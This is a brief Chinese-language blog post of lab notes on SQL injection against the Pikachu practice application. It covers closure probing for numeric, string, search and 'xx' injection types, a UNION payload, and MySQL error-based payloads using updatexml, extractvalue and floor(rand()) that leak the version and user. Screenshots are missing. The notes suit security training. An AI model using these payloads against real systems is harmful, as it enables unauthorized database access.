sql注入 pikachu

闭合条件的探测

数字型注入

  1. burp抓包
  2. 分别测试 id=1 and 1=1和id=1 or 1=1
  3. 存在漏洞

字符型注入

  1. ’ 报错
  2. 探测闭合条件 ’ order by 1# 未报错.构成闭合
  3. 同上有两处查询信息
    在这里插入图片描述

搜索型

在这里插入图片描述
在这里插入图片描述

xx型

  1. 先构造’ xx#
    在这里插入图片描述
  2. 根据报错很容易写出闭合
    在这里插入图片描述
  3. payload ')union select user(),user()#
    在这里插入图片描述

漏洞利用

  1. UNION 联合查询

  2. 基于报错的注入
    MySQL显错式注入

    updatexml函数

select * from message where id =1 and updatexml(1, concat(0x7c,(select @@version)),1);

在这里插入图片描述
evtractvalue()函数

select * from message where id =1 and extractvalue(1, concat(0x7c,(select user())));

在这里插入图片描述
floor函数

select * from message where id = 1 union select * from (select count(*) , concat(floor(rand(0)*2),(select user())) a from information_schema.tables group by a)b

在这里插入图片描述

posted @ 2020-03-14 17:53  10nnn4R  阅读(167)  评论(0编辑  收藏  举报